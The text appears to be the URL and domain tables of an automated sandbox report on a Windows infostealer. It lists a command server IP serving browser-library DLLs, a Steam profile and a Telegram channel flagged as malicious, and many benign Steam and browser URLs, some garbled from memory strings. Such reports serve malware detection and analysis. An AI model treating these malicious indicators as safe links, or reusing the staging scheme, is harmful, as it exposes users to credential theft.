https://steamcommunity.com/?subsection=broadcasts | 0% | Avira URL Cloud | safe
https://steamcommunity.com/profiles/76561199761128941 | 100% | Avira URL Cloud | malware
https://94.130.188.148/nss3.dll | 100% | Avira URL Cloud | malware
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
https://t.me/iyigunl | 100% | Avira URL Cloud | malware
https://94.130.188.148/vcruntime140.dllCz | 100% | Avira URL Cloud | malware
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en | 0% | URL Reputation | safe
https://94.130.188.148/sqlr.dll | 100% | Avira URL Cloud | malware
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=iyaDfxhc | 0% | Avira URL Cloud | safe
https://store.steampowered.com/stats/ | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | 0% | URL Reputation | safe
https://store.steampowered.com/steam_refunds/ | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://store.steampowered.com/legal/ | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e | 0% | URL Reputation | safe
http://www.sqlite.org/copyright.html. | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl | 0% | URL Reputation | safe
http://upx.sf.net | 0% | URL Reputation | safe
https://store.steampowered.com/ | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw | 0% | URL Reputation | safe
http://stadiatechnologies.comntent-Disposition: | 0% | Avira URL Cloud | safe
https://94.130.188.148/ | 100% | Avira URL Cloud | malware
https://steamcommunity.com/login/home/?goto=profiles%2F76561199761128941 | 0% | Avira URL Cloud | safe
http://www.mozilla.com/en-US/blocklist/ | 0% | Avira URL Cloud | safe
https://steamcommunity.com/profiles/765611997611289410 | 0% | Avira URL Cloud | safe
http://www.autoitscript.com/autoit3/J | 0% | Avira URL Cloud | safe
http://stadiatechnologies.com | 0% | Avira URL Cloud | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
https://94.130.188.148/vcruntime140.dll | 100% | Avira URL Cloud | malware
https://steamcommunity.com/profiles/76561199761128941/badges | 100% | Avira URL Cloud | malware
http://stadiatechnologies.com/J | 0% | Avira URL Cloud | safe
https://94.130.188.148/freebl3.dll | 100% | Avira URL Cloud | malware
https://94.130.188.148/softokn3.dlle | 100% | Avira URL Cloud | malware
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477 | 0% | Avira URL Cloud | safe
https://94.130.188.148/mozglue.dll | 100% | Avira URL Cloud | malware
http://94.130.188.14887631f194nt-Disposition: | 0% | Avira URL Cloud | safe
https://steamcommunity.com/profiles/76561199761128941b | 0% | Avira URL Cloud | safe
https://steamcommunity.com/my/wishlist/ | 0% | Avira URL Cloud | safe
http://stadia.188.148HIE | 0% | Avira URL Cloud | safe
http://stadiatechnologies.alntent-Disposition: | 0% | Avira URL Cloud | safe
https://94.130.188.148/softokn3.dll | 100% | Avira URL Cloud | malware
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english | 0% | Avira URL Cloud | safe
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org | 0% | Avira URL Cloud | safe
https://steamcommunity.com/market/ | 0% | Avira URL Cloud | safe
https://94.130.188.148/nss3.dllKEBKJD-journal | 100% | Avira URL Cloud | malware
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi | 0% | Avira URL Cloud | safe
https://94.130.188.148 | 100% | Avira URL Cloud | malware
http://stadiatechnologies.com/ | 0% | Avira URL Cloud | safe
https://steamcommunity.com/profiles/76561199761128941/inventory/ | 100% | Avira URL Cloud | malware
https://steamcommunity.com/discussions/ | 0% | Avira URL Cloud | safe
https://t.me/iyigunlhellosqlr.dllsqlite3.dllIn | 0% | Avira URL Cloud | safe
https://94.130.188.148/mozglue.dllq | 100% | Avira URL Cloud | malware
https://steamcommunity.com/workshop/ | 0% | Avira URL Cloud | safe
http://stadiatechnologies.1f19464; | 0% | Avira URL Cloud | safe
https://94.130.188.148/sqlr.dll1 | 100% | Avira URL Cloud | malware
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=cii- | 0% | Avira URL Cloud | safe
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=od0wu57c9_w6&amp;l=e | 0% | Avira URL Cloud | safe
https://94.130.188.148DGI | 0% | Avira URL Cloud | safe
https://94.130.188.148/msvcp140.dll | 100% | Avira URL Cloud | malware
https://94.130.188.148JKF | 0% | Avira URL Cloud | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
https://94.130.188.148/msvcp140.dllI | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 23.197.127.21 | true | true | - | unknown
stadiatechnologies.com | 95.164.119.162 | true | true | - | unknown
gCmUfnfZJOKMjo.gCmUfnfZJOKMjo | unknown | unknown | false | - | unknown
Name | Malicious | Antivirus Detection | Reputation
https://steamcommunity.com/profiles/76561199761128941 | true | Avira URL Cloud: malware | unknown
https://94.130.188.148/nss3.dll | true | Avira URL Cloud: malware | unknown
https://94.130.188.148/sqlr.dll | true | Avira URL Cloud: malware | unknown
https://94.130.188.148/ | true | Avira URL Cloud: malware | unknown
https://94.130.188.148/vcruntime140.dll | true | Avira URL Cloud: malware | unknown
https://94.130.188.148/freebl3.dll | true | Avira URL Cloud: malware | unknown
https://94.130.188.148/mozglue.dll | true | Avira URL Cloud: malware | unknown
https://94.130.188.148/softokn3.dll | true | Avira URL Cloud: malware | unknown
http://stadiatechnologies.com/ | true | Avira URL Cloud: safe | unknown
https://94.130.188.148/msvcp140.dll | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | KEBKJD.11.dr | false | Avira URL Cloud: safe | unknown
https://t.me/iyigunl | Tenant.pif, 0000000B.00000003.3255137862.0000000004522000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3255083848.0000000001790000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000151000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3254895213.0000000001511000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4072894428.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074431990.0000000001764000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3254796660.00000000015AE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074431990.000000000178F000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://duckduckgo.com/ac/?q= | KEBKJD.11.dr | false | Avira URL Cloud: safe | unknown
https://steamcommunity.com/?subsection=broadcasts | Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.dr | false | Avira URL Cloud: safe | unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743. | Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074033487.00000000015AD000.00000004.00000800.00020000.00000000.sdmp, CBFCBK.11.dr | false | URL Reputation: safe | unknown
https://store.steampowered.com/subscriber_agreement/ | Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.dr | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=iyaDfxhc | Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.dr | false | Avira URL Cloud: safe | unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.dr | false | URL Reputation: safe | unknown
https://www.autoitscript.com/autoit3/ | file.exe, 00000000.00000003.2009804495.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif.2.dr, Neo.0.dr | false | Avira URL Cloud: safe | unknown
https://94.130.188.148/vcruntime140.dllCz | Tenant.pif, 0000000B.00000002.4073357745.0000000001479000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://www.valvesoftware.com/legal.htm | Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.dr | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp | Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.dr | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.dr | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.dr | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp; | Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.dr | false | URL Reputation: safe | unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.dr | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL | Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.dr | false | URL Reputation: safe | unknown
http://stadiatechnologies.comntent-Disposition: | Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://steamcommunity.com/profiles/765611997611289410 | Tenant.pif, 0000000B.00000002.4072894428.0000000001394000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&amp;l=en | Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.dr | false | URL Reputation: safe | unknown
https://steamcommunity.com/profiles/76561199761128941/badges | Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.dr | true | Avira URL Cloud: malware | unknown
http://www.autoitscript.com/autoit3/J | file.exe, 00000000.00000003.2009804495.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp, Tenant.pif.2.dr, Neo.0.dr | false | Avira URL Cloud: safe | unknown
http://www.mozilla.com/en-US/blocklist/ | Tenant.pif, 0000000B.00000002.4097408823.000000006C69D000.00000002.00000001.01000000.00000009.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.dr | false | Avira URL Cloud: safe | unknown
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english | Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.dr | false | URL Reputation: safe | unknown
https://mozilla.org0/ | Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | false | URL Reputation: safe | unknown
http://stadiatechnologies.com | Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://store.steampowered.com/privacy_agreement/ | Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.dr | false | URL Reputation: safe | unknown
https://store.steampowered.com/points/shop/ | Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.dr | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | KEBKJD.11.dr | false | Avira URL Cloud: safe | unknown
                          http://nsis.sf.net/NSIS_ErrorErrorfile.exefalse
                          • URL Reputation: safe
                          unknown
                          https://steamcommunity.com/login/home/?goto=profiles%2F7656119976112894176561199761128941[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.ecosia.org/newtab/KEBKJD.11.drfalse
                          • URL Reputation: safe
                          unknown
                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brHJKECA.11.drfalse
                          • URL Reputation: safe
                          unknown
                          https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          unknown
                          https://store.steampowered.com/privacy_agreement/Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          unknown
                          http://94.130.188.14887631f194nt-Disposition:Tenant.pif, 0000000B.00000002.4068394882.0000000000182000.00000040.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          unknown
                          https://94.130.188.148/softokn3.dlleTenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          unknown
                          https://steamcommunity.com/profiles/76561199761128941bTenant.pif, 0000000B.00000003.3255137862.0000000004522000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3255083848.0000000001790000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000151000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3254895213.0000000001511000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4072894428.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074431990.0000000001764000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3254796660.00000000015AE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074431990.000000000178F000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          unknown
                          http://stadiatechnologies.com/JTenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLHJKECA.11.drfalse
                          • URL Reputation: safe
                          unknown
                          https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          unknown
                          https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refTenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074033487.00000000015AD000.00000004.00000800.00020000.00000000.sdmp, CBFCBK.11.drfalse
                          • URL Reputation: safe
                          unknown
                          https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          unknown
                          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074033487.00000000015AD000.00000004.00000800.00020000.00000000.sdmp, CBFCBK.11.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngTenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          unknown
                          http://stadiatechnologies.alntent-Disposition:Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          unknown
                          https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          unknown
                          https://store.steampowered.com/about/76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          unknown
                          https://steamcommunity.com/my/wishlist/Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://stadia.188.148HIETenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=5iTMW1V3HmVR&aTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          unknown
                          https://help.steampowered.com/en/Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          unknown
                          https://steamcommunity.com/market/Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://store.steampowered.com/news/Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          unknown
                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiCBFCBK.11.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=KEBKJD.11.drfalse
                          • URL Reputation: safe
                          unknown
                          http://store.steampowered.com/subscriber_agreement/Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          unknown
                          https://94.130.188.14876561199761128941[1].htm.11.drfalse
                          • Avira URL Cloud: malware
                          unknown
                          https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://steamcommunity.com/profiles/76561199761128941/inventory/Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drtrue
                          • Avira URL Cloud: malware
                          unknown
                          https://94.130.188.148/nss3.dllKEBKJD-journalTenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enTenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          unknown
                          https://steamcommunity.com/discussions/Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://store.steampowered.com/stats/Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          unknown
                          https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=cii-Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          unknown
                          https://store.steampowered.com/steam_refunds/Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drfalse
                          • URL Reputation: safe
                          unknown
